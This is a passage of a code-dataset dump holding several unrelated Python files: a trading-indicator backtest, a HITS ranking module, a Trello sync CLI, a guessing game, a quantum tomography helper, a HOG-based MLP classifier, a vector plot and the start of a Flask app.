sheet_name=\"110051中天转债\").fillna(method='ffill')\n\n\n# df1,df2,df4,df5\n#\n# df['Mean'] = SMA(df.close.values, 30)\n# df['Std'] = STD(df.close.values, 30)\n# a = 60\n# df['Mean'] = SMA(df.close.values, a)\n# df['Std'] = STD(df.close.values, 20, a)\n# df['KAMA'] = talib.KAMA(df.close, 30)\n# df1['KAMA'] = talib.KAMA(df1.close, 20)\n# df2 = df2.fillna(method='ffill')\n# df1['KAMA'] = talib.KAMA(df1.close, 20)\n# df2['KAMA'] = talib.KAMA(df2.close, 20)\n# df3['KAMA'] = talib.KAMA(df3.close, 20)\n# df4['KAMA'] = talib.KAMA(df4.close, 20)\n# df5['KAMA'] = talib.KAMA(df5.close, 20)\n# df6['KAMA'] = talib.KAMA(df6.close, 20)\n# df7['KAMA'] = talib.KAMA(df7.close, 20)\n#\ndef profitsCal(df,start,end,positionList,upper=0.02,lower=0.01, adds = 0.1, cutoff = 0.1):\n buypriceList = []\n yieldList = []\n for i in np.arange(1,df.shape[0]):\n if len(buypriceList) > 0 and (df.high[i] >= buypriceList[0] + 0.02 or df.high[i-1] >= buypriceList[0] + 0.02):\n yieldList.append(0.015)\n buypriceList.pop(0)\n # if len(buypriceList) > 0 and df.high[i] == buypriceList[0] + 0.03:\n # yieldList.append(0.015)\n # buypriceList.pop(0)\n # if len(buypriceList) > 0 and df.high[i] == buypriceList[0] + 0.02:\n # yieldList.append(-0.005)\n # buypriceList.pop(0)\n if len(buypriceList) > 0 and df.low[i] <= df.high[i] - 0.02:\n yieldList.append(max(df.high[i]-buypriceList[0]-0.02,df.high[i-1]-buypriceList[0]-0.02))\n buypriceList.pop(0)\n\n if df.high[i] >= df.KAMA[i]-0.02 and df.close[i-1] < df.KAMA[i-1]: # 前一分钟的收盘价在均值一下,这一分钟的最高价在均值以上\n if buypriceList.__len__() == 0:\n buypriceList.append(df.KAMA[i]-0.015)\n return yieldList\n\ndef Cal(df,start,end,positionList,upper=0.02,lower=0.01, adds = 0.1, cutoff = 0.1):\n yieldList = []\n for i in np.arange(100, df.shape[0]):\n if df.close[i-1] < df.KAMA[i-1]:\n if df.high[i] >= df.KAMA[i] + 0.01: # 前一分钟的收盘价在均值一下,这一分钟的最高价在均值以上\n yieldList.append(0.01)\n if df.high[i] > df.KAMA[i] - 0.02 and df.high[i] < df.KAMA[i] + 0.01:\n yieldList.append(-0.01)\n return yieldList\n#\n#\n# yieldList = profitsCal(df2,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df1,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df3,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df4,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df5,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df6,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n#\n# yieldList = profitsCal(df7,100,4000,[])\n# print(len(yieldList))\n# print(sum(yieldList))\n\n\n##################2019年5月27日16:58:51\ndef func1(df):\n df['KAMA'] = talib.KAMA(df.close, 20)\n temp = (df.low - df.KAMA.shift(1)).dropna().values\n notes = []\n su = []\n for item in temp:\n if item < 0:\n su.append(item)\n else:\n if su.__len__() > 0:\n notes.append(min(su))\n su = []\n plt.hist(notes, 100)\n plt.show()\n print(\"30:%f\" % np.quantile(notes, 0.3))\n print(\"70:%f\" % np.quantile(notes, 0.7))\n return notes\n\n\ndef test(df, start, end):\n df['upper'], df['middle'], df['lower'] = talib.BBANDS(df.close, matype=talib.MA_Type.T3)\n df['CCI'] = talib.CCI(df.high, df.low, df.close, timeperiod=24)\n df['macd'], macdsignal, macdhist = talib.MACD(df.close)\n df['HT_DCPERIOD'] = talib.HT_DCPERIOD(df.close)\n # (df.high > df.lower) & ((df.low < df.lower).shift(1))\n # df.CCI > 200 # False\n # (df.CCI >= -200) & (df.CCI < 0) # False\n df['buy_point'] = (df.high > df.lower) & (df.low < df.lower).shift(1) & (\n (df.CCI >= 0) & (df.CCI < 200) | (df.CCI < -200)) & (df.macd > -0.05) & (df['HT_DCPERIOD'] > 20)\n x_point = df[df['buy_point'] == True].index.values + 1\n y_point = df[df['buy_point'] == True].close\n plt.plot(df.close)\n plt.plot(x_point, y_point, 'o')\n plt.show()\n\n\ntest(df.iloc[500:3500, :].copy(), 500, 1500)\n\n\n####\ndef bolltest(df, start, end):\n upper, middle, lower = talib.BBANDS(df.close, matype=talib.MA_Type.T3)\n plt.plot(upper[start:end])\n plt.plot(middle[start:end])\n plt.plot(lower[start:end])\n plt.plot(df.close.iloc[start:end])\n idx = np.arange(df.shape[0])\n # temp = (df.close > lower)& (df.close < lower).shift(1)\n # temp = temp.shift(1)\n # temp[:start] = False\n # temp[end:] = False\n # plt.plot(idx[temp], df.close[temp],'yo')\n plt.legend(['upper', 'middle', 'lower', 'close'])\n plt.title(\"bolling\")\n plt.show()\n\n\noutput = bolltest(df, 500, 1500)\n\n\ndef ATRtest(df, start, end):\n outATR = talib.ATR(df.high, df.low, df.close, timeperiod=10)\n plt.plot(outATR[start:end])\n plt.legend(['ATR'])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"ATR\")\n plt.show()\n\n\noutATR = ATRtest(df, 500, 1500)\n\n\ndef HT_DCPERIODtest(df, start, end):\n outHT = talib.HT_DCPERIOD(df.close)\n plt.plot(outHT[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"HT_DCPEIOD\")\n plt.show()\n\n\nHT_DCPERIODtest(df, 500, 1500)\n\n\ndef MACDtest(df, start, end):\n macd, macdsignal, macdhist = talib.MACD(df.close)\n plt.plot(macd[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"MACD\")\n plt.show()\n\n\nMACDtest(df, 500, 1500)\n\n\ndef CCItest(df, start, end):\n real = talib.CCI(df.high, df.low, df.close, timeperiod=24)\n plt.plot(real[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"CCI\")\n plt.show()\n\n\nCCItest(df, 500, 1500)\n\n\ndef RSItest(df, start, end):\n real = talib.RSI(df.high, timeperiod=14)\n plt.plot(real[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"RSI\")\n plt.show()\n\n\nRSItest(df, 500, 1500)\n","sub_path":"scripts/冲击均线模型.py","file_name":"冲击均线模型.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"58197302","text":"import glob\nimport os\n\nimport requests\nimport math\n\nurlMap = dict()\nurlMapId = dict()\nadjList = dict()\ncwd = os.getcwd()\n\n\ndef get_url_map():\n file_path = cwd + \"/Climate_App/hits/urlMap\"\n file = open(file_path, \"r\")\n for urlReads in file:\n urlDetails = urlReads[1:].split('=')\n if(len(urlDetails) > 1):\n urlMap[urlDetails[0].strip()] = urlDetails[1].replace('\\n', '')\n urlMapId[urlDetails[1].replace('\\n', '')] = urlDetails[0].strip()\n\ndef get_adj_lis():\n file_path = cwd + \"/Climate_App/hits/adjList\"\n file = open(file_path, \"r\")\n for urlArray in file:\n arrayList = urlArray[1:].split('=')\n if(len(arrayList) > 1):\n arrayList[1] = arrayList[1].replace('\\n', '')\n adjList[arrayList[0]] = arrayList[1].split(' ')\n\ndef add_to_map(map, key, val):\n if(map.get(urlMap[key])):\n map.get(urlMap[key]).append(urlMap[val])\n else:\n map[urlMap[key]] = [urlMap[val]]\n return map\n\ndef make_graph(inlinks, outlinks):\n global adjList\n for key in adjList:\n url_list = adjList[key]\n for url in url_list:\n outlinks = add_to_map(outlinks, key.strip(), url.strip())\n inlinks = add_to_map(inlinks, url.strip(), key.strip())\n return inlinks, outlinks\n\ndef get_query(results):\n global urlMap\n jsonMap = dict()\n input_urls_id = list()\n input_urls = list()\n docs = results['response']['docs']\n doc_len = min(len(docs), 10)\n for i in range(0, doc_len):\n jsonMap[docs[i]['url']] = docs[i]\n input_urls.append(docs[i]['url'])\n\n for url in input_urls:\n if(urlMap.get(url)):\n id = urlMap[url]\n input_urls_id.append(id)\n return input_urls_id, jsonMap\n\n\ndef initalize_ranking(union_url_ids):\n hub_score, auth_score = dict(), dict()\n for key in union_url_ids:\n hub_score[key] = 1\n auth_score[key] = 1\n return hub_score, auth_score\n\ndef isConverged(new_rank, old_rank):\n converged = True\n tolerance = 0.01\n for key in new_rank:\n a=(new_rank[key])\n c=a-(old_rank[key])\n if ((abs(c)) > (tolerance)):\n converged = False\n break\n return converged\n\ndef compute_score(hub_score, auth_score, inlinks, outlinks, union_url_ids):\n newAuthRank = calcAuthscore(hub_score, auth_score, inlinks, union_url_ids)\n calcHubScore(hub_score, auth_score, outlinks, union_url_ids)\n while not isConverged(newAuthRank, auth_score):\n newAuthRank = calcAuthscore(hub_score, auth_score, inlinks, union_url_ids)\n newHubRank = calcHubScore(hub_score, auth_score, outlinks, union_url_ids)\n hub_score = newHubRank\n auth_score = newAuthRank\n\n\n\ndef calcHubScore(hub_score, auth_score, outlinks, union_url_ids):\n temp_rank = dict()\n norm = 0\n for key in hub_score:\n temp_rank[key] = 0.0\n if(outlinks.get(key) != None):\n tempList = outlinks[key]\n else:\n continue\n hubScore = 0.0\n for dest in tempList:\n if (dest in union_url_ids):\n hubScore += auth_score[dest]\n norm += math.pow(hubScore, 2)\n temp_rank[key] = hubScore\n norm = math.sqrt(norm)\n for key in temp_rank:\n temp_rank[key] = temp_rank[key] / norm\n\n return temp_rank\n\ndef calcAuthscore(hub_score, auth_score, inlinks, union_url_ids):\n temp_rank = dict()\n norm = 0\n for key in auth_score:\n temp_rank[key] = 0.0\n if(inlinks.get(key) != None):\n tempList = inlinks[key]\n else:\n continue\n authScore = 0.0\n for dest in tempList:\n if (dest in union_url_ids ):\n authScore += hub_score[dest]\n norm += math.pow(authScore, 2)\n temp_rank[key]= authScore\n norm = math.sqrt(norm)\n for key in temp_rank:\n temp_rank[key] = temp_rank[key] / norm\n return temp_rank\n\ndef get_hits(results):\n input_urls_id, jsonMap = get_query(results)\n inlinks, outlinks = dict(), dict()\n inlinks, outlinks = make_graph(inlinks, outlinks)\n union_url_ids = list()\n required_auth_score = dict()\n sorted_auth_score = dict()\n\n for key in input_urls_id:\n if (key == None):\n continue\n union_url_ids.append(key)\n outs = outlinks.get(key)\n if outs == None:\n continue\n else :\n for i in range(0, len(outs)):\n union_url_ids.append(outs[i])\n\n ins = inlinks.get(key)\n if ins == None:\n continue\n else:\n for i in range(0, len(ins)):\n union_url_ids.append(ins[i])\n\n hub_score, auth_score = initalize_ranking(union_url_ids)\n\n compute_score(hub_score, auth_score, inlinks, outlinks, union_url_ids)\n response = []\n for id in input_urls_id:\n score = auth_score[id]\n required_auth_score[id] = score\n for k in sorted(required_auth_score, key=required_auth_score.__getitem__, reverse=True):\n sorted_auth_score[k] = required_auth_score[k]\n for key in sorted_auth_score:\n url = urlMapId[key]\n response.append(jsonMap[url])\n\n return response\n\n\n","sub_path":"IR_Climate/Climate_App/hits/hits.py","file_name":"hits.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"405901630","text":"def fll(aList):\n ''' \n aList: a list \n Returns a copy of aList, which is a flattened version of aList \n '''\n r = []\n n = 0\n for i in aList:\n if isinstance(i, list):\n r += (fll(aList[n]))\n else:\n r.append(i)\n n += 1\n return r\n \n#fll([[1,'a',['cat'],2],[[[3]],'dog'],4,5])","sub_path":"6.00.1x/fllaten a list.py","file_name":"fllaten a list.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"331580050","text":"#!/usr/bin/env python3\n\nfrom app.collector import TrelloCollector\nfrom app.CFtoBoard import CFtoBoard\n\nimport logging\nimport os\nimport yaml\nimport argparse\n\n\ndef main():\n logging_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(format=logging_format,\n level=logging.INFO)\n\n logger = logging.getLogger(__name__)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', help='report config',\n default=\"config/cfsync.yml\")\n parser.add_argument('--parent', help='parent card')\n parser.add_argument('action', nargs='?',\n help='list to list custom fields,'\n 'sync_cf to sync downstream',\n default=\"sync_cf\")\n args = parser.parse_args()\n\n if os.path.isfile(args.config):\n with open(args.config, 'r') as stream:\n report_config = yaml.load(stream)\n else:\n logger.error('Invalid configuration file!')\n return\n\n with open(\"secrets/trello_secret.yml\", 'r') as stream:\n trello_secret_config = yaml.load(stream)\n\n collector = TrelloCollector(report_config, trello_secret_config)\n logger.info('Started querying of Trello {}'.format(collector))\n\n if args.action == 'list':\n collector.list_boards() # output list of Trello boards and lists\n return\n elif args.action == 'list_parents':\n collector.print_cards(collector.parent_cards_generator(), \"Parent\")\n# for card in collector.parent_cards_generator():\n# logger.info(\"Parent card: {}\".format(card))\n elif args.action == 'list_all_children':\n collector.print_cards(collector.all_children_card_generator(), \"Child\")\n elif args.action == 'sync_cf':\n cf_list = collector.list_cf()\n for cf_val in cf_list:\n logger.info(\"Custom field name: {}\".format(cf_val['name']))\n for board in collector.target_board_generator():\n cf_to_board = CFtoBoard(cf_val['name'], cf_val['values'],\n board)\n cf_to_board.check_and_add_board_cf()\n return\n else:\n logger.error('Unrecognized actions %s' % (args.action))\n return\n\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"169244927","text":"# !/usr/bin/env python3\r\n\r\nimport random\r\n\r\nprevcat = 0\r\nprevdiff = 0\r\n\r\ndef getGuess():\r\n #final version: must validate input as 0 to 100 and not crash on illegal input\r\n # and loop until correct input\r\n g = -1\r\n while g < 0 or g > 100:\r\n try:\r\n g = int(input(\"Your Guess? (0=quit): \"))\r\n if g < 0 or g > 100:\r\n print(\"Numbers between 0 and 100 only. \")\r\n except ValueError:\r\n print(\"must validate input as 0 to 100 and not crash on illegal input\")\r\n return g\r\n\r\ndef playHighLow(rn):\r\n print(\"I am thinking of a number from 1 to 100...\" + str(rn))\r\n gcount = 0\r\n playing = True #boolean: True or False\r\n while playing:\r\n guess = getGuess()\r\n gcount += 1\r\n if guess == 0:\r\n print(\"Sorry, you did not guess my number: \"\r\n + str(rn) + \" in \" + str(gcount-1) + \" tries.\")\r\n playing = False\r\n elif guess == rn:\r\n print(\"You guessed it! It took \" + str(gcount) + \" tries.\")\r\n playing = False\r\n else:\r\n showHighLow(rn,guess)\r\n playing = True \r\n\r\ndef playHotCold(rn):\r\n print(\"I am thinking of a number from 1 to 100...\" + str(rn))\r\n gcount = 0\r\n playing = True #boolean: True or False\r\n while playing:\r\n guess = getGuess()\r\n gcount += 1\r\n if guess == 0:\r\n print(\"Sorry, you did not guess my number: \"\r\n + str(rn) + \" in \" + str(gcount-1) + \" tries.\")\r\n playing = False\r\n elif guess == rn:\r\n print(\"You guessed it! It took \" + str(gcount) + \" tries.\")\r\n playing = False\r\n else:\r\n showHotCold(rn,guess)\r\n playing = True\r\n #end of playHotCold\r\n\r\ndef showHighLow(rn, guess):\r\n diff = abs(rn - guess) # absolute value of difference\r\n category = 0\r\n msg = \"\"\r\n if diff <= guess - rn:\r\n category = 1\r\n msg = \"Sorry, that guess is too high\" \r\n else:\r\n diff >= guess - rn\r\n category = 2\r\n msg = \"Sorry, that guess is too low\"\r\n\r\n\r\n print(\"Your guess is: \" + msg) \r\n\r\n \r\ndef showHotCold(rn, guess):\r\n global prevcat, prevdiff\r\n diff = abs(rn - guess) # absolute value of difference\r\n category = 0\r\n msg = \"\"\r\n if diff >= 60:\r\n category = 1\r\n msg = \"cold\"\r\n elif diff >= 30:\r\n category = 2\r\n msg = \"warm\"\r\n elif diff >= 16:\r\n category = 3\r\n msg = \"very warm\"\r\n else:\r\n category = 4\r\n msg = \"HOT\"\r\n\r\n if category == prevcat:\r\n #add modifier\r\n if diff == prevdiff:\r\n msg += \" (same degree)\"\r\n elif diff > prevdiff:\r\n msg += \" (getting colder)\"\r\n else:\r\n if category == 4:\r\n msg += \"(getting HOTTER)\"\r\n else:\r\n msg += \" (getting warmer)\"\r\n\r\n print(\"Your guess is: \" + msg)\r\n prevcat = category #update global variables to 'remember settings\r\n prevdiff = diff\r\n \r\n\r\ndef main():\r\n print(\"Welcome to the Guessing Game\")\r\n\r\n gametype = getChoice()\r\n while gametype != 0:\r\n rnum = random.randint(1,100)\r\n if gametype == 1:\r\n playHotCold(rnum)\r\n elif gametype == 2:\r\n playHighLow(rnum)\r\n else:\r\n print(\"I do not know that game!\")\r\n print()\r\n gametype = getChoice()\r\n print(\"Thanks for playing!\")\r\n\r\ndef getChoice():\r\n c = -1\r\n while c < 0 or c > 2:\r\n try:\r\n c = int(input(\"Game type: 1=Hot/Cold, 2=High/Low, 0=Quit): \"))\r\n if c < 0 or c > 2:\r\n print(\"Unknown game type: 0, 1, or 2 only.\")\r\n except ValueError:\r\n print(\"Illegal input: integers from 0 to 2 only\")\r\n c = -1\r\n return c\r\n\r\nif __name__== \"__main__\":\r\n main()\r\n","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"178490840","text":"\"\"\"\r\nHelper methods for single qubit state tomography.\r\n\r\nAuthor: Andrew Cross\r\n\"\"\"\r\nimport copy\r\n\r\n\r\ndef expectation_Z(data, j):\r\n \"\"\"Compute the expectation value of Z for the jth qubit.\r\n\r\n The data takes the form {\"bitstring\": count,...}\r\n \"\"\"\r\n shots = sum(data.values())\r\n total = 0.0\r\n for k, v in data.items():\r\n total += (-1)**int(k[len(k)-j-1])*float(v)/float(shots)\r\n return total\r\n\r\n\r\n# Measurement instruction\r\nmeas_str = \"measure %s[%d] -> %s[%d];\\n\"\r\n\r\n\r\ndef generate_tomo1_circuits(baseQASM, tomo_qubits,\r\n input_qreg='q', input_creg='c'):\r\n \"\"\"Generate a collection of circuits to implement 1Q state tomography.\r\n\r\n baseQASM = input QASM source file with one input_qreg and one input_creg\r\n of the same size of the qreg, no measurements, and includes \"qelib1.inc\"\r\n on line 2.\r\n tomo_qubits = list of indices of input_qreg for 1Q state tomography\r\n input_qreg = string containing qreg name\r\n input_creg = string containing creg name\r\n \"\"\"\r\n job = []\r\n for post_rotation in [['h'], ['sdg', 'h'], []]:\r\n qasm = {'qasm': copy.copy(baseQASM)}\r\n for q in tomo_qubits:\r\n for g in post_rotation:\r\n qasm['qasm'] += \"%s %s[%d];\\n\" % (g, input_qreg, q)\r\n qasm['qasm'] += meas_str % (input_qreg, q, input_creg, q)\r\n job.append(qasm)\r\n return job\r\n","sub_path":"scripts/qhelpers/tomo1.py","file_name":"tomo1.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"227533185","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\nfrom tqdm import trange\nimport random\n\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n\n\n\nif torch.cuda.is_available():\n device = torch.device('cuda')\nelse:\n device = torch.device('cpu')\n\ndef zero_padding(pad_size, img):\n input_y = len(img)\n input_x = len(img[0])\n output = np.zeros((input_y + 2 * pad_size, input_x + 2 * pad_size))\n for y in range(input_y + 2 * pad_size):\n for x in range(input_x + 2 * pad_size):\n if pad_size <= y < (input_y + pad_size) and pad_size <= x < (input_x + pad_size): \n output[y][x] = img[y-pad_size][x-pad_size]\n return output\n\ndef set_histogram(mag, ang):\n hist = np.zeros(shape = 10, dtype = float)\n for cnt in range(9):\n idx = np.where(ang < (cnt + 1) * 20)\n tmp2 = (ang[idx] - cnt * 20)/((cnt + 1) * 20)\n tmp1 = 1 - tmp2\n tmp2 *= mag[idx] \n tmp1 *= mag[idx]\n hist[cnt] += np.sum(tmp1)\n hist[cnt+1] += np.sum(tmp2)\n ang[idx] = 300\n hist[0] += hist[9]\n return hist[:9]\n\ndef hist_normalize(histogram, bat_h,bat_w):\n \n hist_h, hist_w, ang_num = histogram.shape\n ## 8,8,9\n # histogram = list(histogram)\n # output = np.zeros(shape = (hist_h - bat_h + 1,hist_w - bat_w + 1))\n output = []\n ## 7, 7\n batch = np.zeros(shape = (bat_h,bat_w,ang_num))\n batch_sum = np.zeros(shape = ())\n \n ## 2, 2\n for h in range(hist_h - bat_h + 1): # 7\n for w in range(hist_w - bat_w + 1): # 7\n batch = histogram[h:h+bat_h,w:w+bat_w,:]\n batch = batch.reshape((bat_h * bat_w,ang_num))\n batch_sum = batch[0] + batch[1] + batch[2] + batch[3]\n batch_sum = batch_sum / np.linalg.norm(batch_sum, axis = -1, ord = 2)\n output.append(batch_sum)\n \n output = np.array(output)\n return output\n\n\n\n\n\ndef plot_hist(hist):\n ## shape = [49][9] \n cell_num, angs = hist.shape\n # hist[0] 먼저 plot\n\n cnt = 0\n # shape = [9]\n # plt.figure(figsize = (20,20))\n fig, ax = plt.subplots(nrows = 7, ncols = 7, sharex = True, sharey = True, figsize = (10,10))\n for h in range(7):\n for w in range(7):\n for idx, val in enumerate(hist[cnt]):\n x = np.linspace(-2, 2,50)\n\n if val > 0.2:\n line = ax[h][w].plot(x, np.tan((idx * 20 + 90) * np.pi / 180) * x)\n \n plt.setp(line, color = 'r', linewidth = 2.0 * val )\n ax[h][w].axis('off')\n plt.xlim(-2,2)\n plt.ylim(-2,2)\n\n cnt += 1\n plt.show()\n \n\nclass Gradient():\n def __init__(self,input,pad,stride = 1,filter = \"sobel\"):\n if filter == \"sobel\":\n self.filter_x = np.array([[-1,0,1],\n [-2,0,2],\n [-1,0,1]]\n )\n self.filter_y = np.array([[1,2,1],\n [0,0,0],\n [-1,-2,-1]]\n )\n self.fil_size = 3\n self.pad = pad\n self.input = input\n self.stride = stride\n self.in_x = len(self.input[0])\n self.in_y = len(self.input)\n self.grad_x = np.zeros(shape = (int(math.floor((self.in_y + 2 * self.pad - self.fil_size)/self.stride) + 1),\n int(math.floor((self.in_x + 2 * self.pad - self.fil_size)/self.stride) + 1)\n ))\n self.grad_y = np.zeros_like(self.grad_x)\n \n \n\n def set_grad(self,img):\n\n for idx_h,h in enumerate(list(range(0, self.in_y - self.fil_size + 2 * self.pad + 1, self.stride))):\n for idx_w,w in enumerate(list(range(0, self.in_x - self.fil_size + 2 * self.pad + 1, self.stride))):\n\n self.grad_x[idx_h][idx_w] = np.sum(img[h:h+3,w:w+3] * self.filter_x)\n self.grad_y[idx_h][idx_w] = np.sum(img[h:h+3,w:w+3] * self.filter_y) \n return self.grad_x,self.grad_y\n def set_grad_mag(self):\n grad_mag = np.power((np.power(self.grad_x,2) + np.power(self.grad_y,2)),1/2)\n return grad_mag\n \n def set_grad_ang(self):\n grad_ang = np.abs(np.arctan2(self.grad_y,self.grad_x+0.00000001))/np.pi*180\n return grad_ang\n def auto(self):\n # for y in range(int(self.in_y/self.bat_y)):\n # for x in range(int(self.in_x/self.bat_x)):\n # img = input[y * self.bat_y: (y+1) * self.bat_y,x * self.bat_x: (x+1) * self.bat_x]\n # # img = zero_padding(2,img)\n # self.set_grad(img)\n # self.grad_mag = self.set_grad_mag()\n # self.grad_ang = self.set_grad_ang()\n # self.histogram.append(set_histogram(self.grad_mag,self.grad_ang))\n # self.histogram = np.array(self.histogram)\n # self.histogram = self.histogram.reshape((int(self.in_y/self.bat_y), int(self.in_x/self.bat_x),9))\n # return self.histogram\n img = self.input\n self.set_grad(img)\n self.grad_mag = self.set_grad_mag()\n self.grad_ang = self.set_grad_ang()\n return self.grad_mag, self.grad_ang\n \n\n#%% \n \n\ndata_x = np.load('./Sign-language-digits-dataset/X.npy')\ndata_y = np.load('./Sign-language-digits-dataset/Y.npy')\nshuffle_idx = np.arange(data_x.shape[0])\nnp.random.shuffle(shuffle_idx)\n\ndata_x = data_x[shuffle_idx]\ndata_y = data_y[shuffle_idx]\n\n\n\ndata_y = np.argmax(data_y, axis = 1)\ndata_y = torch.tensor(data_y, dtype = torch.long).view(-1,1)\n\nprint(\"1\",data_y.shape)\n# grad_mag_list = []\n# grad_ang_list = []\n\ngrad_mag_list = np.zeros(shape = (2062,62,62))\ngrad_ang_list = np.zeros(shape = (2062,62,62))\n\n#%%\n\n\n\npadding = 0\nstride = 1\nbatch = (8,8)\nfor idx,img in enumerate(data_x):\n grad = Gradient(input = img, pad = padding, stride = stride)\n grad_mag, grad_ang = grad.auto()\n grad_mag_list[idx] = grad_mag\n grad_ang_list[idx] = grad_ang\n if idx % 100 == 0:\n print(idx)\n\n\n\n \ngrad_mag_list = torch.tensor(grad_mag_list,dtype = torch.float).view(-1,62 * 62)\ngrad_ang_list = torch.tensor(grad_ang_list,dtype = torch.float).view(-1,62 * 62)\n\n\n \n\n\n\n\n# fig, ax = plt.subplots(2,1,figsize = (20,20))\n\n# ax[0].imshow(grad_mag,'gray')\n# ax[1].imshow(grad_ang,'gray') \n \n \n \n \n#%%\nclass Hog_MLP(nn.Module):\n def __init__(self, p):\n super(Hog_MLP, self).__init__()\n self.model = nn.Sequential(\n # nn.Dropout(p = p),\n nn.Linear(62 * 62,256),\n nn.ReLU(),\n # nn.Dropout(p = p),\n nn.Linear(256,64),\n nn.ReLU(),\n\n nn.Linear(64,10),\n nn.LogSoftmax(dim = -1)\n )\n\n \n \n \n def forward(self, x):\n x = self.model(x)\n\n return x\nepochs = 30\n\nlr = 0.001\ncnt = 0\nloss_list = []\nval_acc_list = []\n\nmodel = Hog_MLP(p = 0).to(device)\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(),lr = lr)\n\ntrain_x = grad_ang_list[ :1800] \ntest_x = grad_ang_list[1800: ]\ntrain_y = data_y[:1800,: ]\ntest_y = data_y[1800: ,: ]\n\n\n\n\n\nfor epoch in trange(epochs):\n model.train()\n loss_epoch = 0\n for step, img in enumerate(train_x):\n\n \n img = img.view(-1,62*62).to(device)\n label = train_y[step].to(device)\n\n pred = model(img)\n optimizer.zero_grad()\n\n loss = criterion(pred,label)\n loss_epoch += loss.item() * pred.shape[0]\n loss.backward()\n optimizer.step()\n loss_epoch /= len(train_x)\n loss_list.append(loss_epoch)\n \n \n model.eval()\n val_acc = 0\n \n for step, img in enumerate(test_x):\n img = img.view(-1,62*62).to(device)\n label = test_y[step].to(device)\n \n pred = model(img)\n topv, topi = pred.topk(1, dim = 1)\n n_correct = (topi.view(-1) == label).type(torch.int)\n val_acc += n_correct.sum().item()\n val_acc /= len(test_x)\n val_acc_list.append(val_acc)\n print(epoch, loss_epoch, val_acc)\n\n \n#%%\n \nfig, ax = plt.subplots(2, 1, figsize = (30, 15))\nax[0].plot(loss_list)\nax[1].plot(val_acc_list)\n\n\n","sub_path":"code/hog/Grad_Ang_MLP.py","file_name":"Grad_Ang_MLP.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94612654","text":"from mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom funcs import *\nimport numpy as np\n\n#if using termux\nimport subprocess\nimport shlex\n#end if\n\n#creating x,y for 3D plotting\nxx, yy = np.meshgrid(range(10), range(10))\n#setting up plot\nfig = plt.figure()\nax = fig.add_subplot(111,projection='3d',aspect='equal')\n\n#defining direction vectors of planes\nl1 = np.array([1,1,0])\nl2 = np.array([-3,5,7])\n\n#finding cross product\ncp = np.cross(l1,l2)\n\n#plotting lines\nplt.plot([0,l1[0]],[0,l1[1]],[0,l1[2]],label=\"Direction Vector of L1\")\nplt.plot([0,l2[0]],[0,l2[1]],[0,l2[2]],label=\"Direction Vector of L2\")\nplt.plot([0,cp[0]],[0,cp[1]],[0,cp[2]],label=\"Cross Product Vector\")\n\n#printing direction vectors\nprint(\"Direction Vector of L1=\",l1)\nprint(\"Direction Vector of L2=\",l2)\nprint(\"Cross Product= \\n\",cp)\n\n#show plot\nplt.xlabel('$x$');plt.ylabel('$y$')\nplt.legend(loc='best');plt.grid()\n#if using termux\nplt.savefig('../figs/2.1.pdf')\nplt.savefig('../figs/2.1.eps')\nsubprocess.run(shlex.split(\"termux-open ../figs/2.1.pdf\"))\n#else\n#plt.show()\n\n\t\n\n","sub_path":"jee/linalg/codes/3d/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"335687197","text":"\nimport os\nimport threading\nimport json\nimport datetime\nimport time\nimport pprint\nimport logging\nimport subprocess\n\nfrom flask import Flask, g, request, render_template\nfrom flask_sockets import Sockets\nimport git\n\nLOG_LOCK = threading.Lock()\n\napp = Flask(__name__)\napp.debug = True\nsockets = Sockets(app)\n\n\napp.logger.debug(\"Reloaded\")\n\n\n@app.route('/')\ndef main():\n return render_template(\"index.html\")\n\n\n@app.route('/test')\ndef testit():\n return \"done\"\n\n\n@app.route('/trigger_samples//')\ndef trigger_samples(repo, path_and_class):\n write_log(\"Triggered samples for {}: 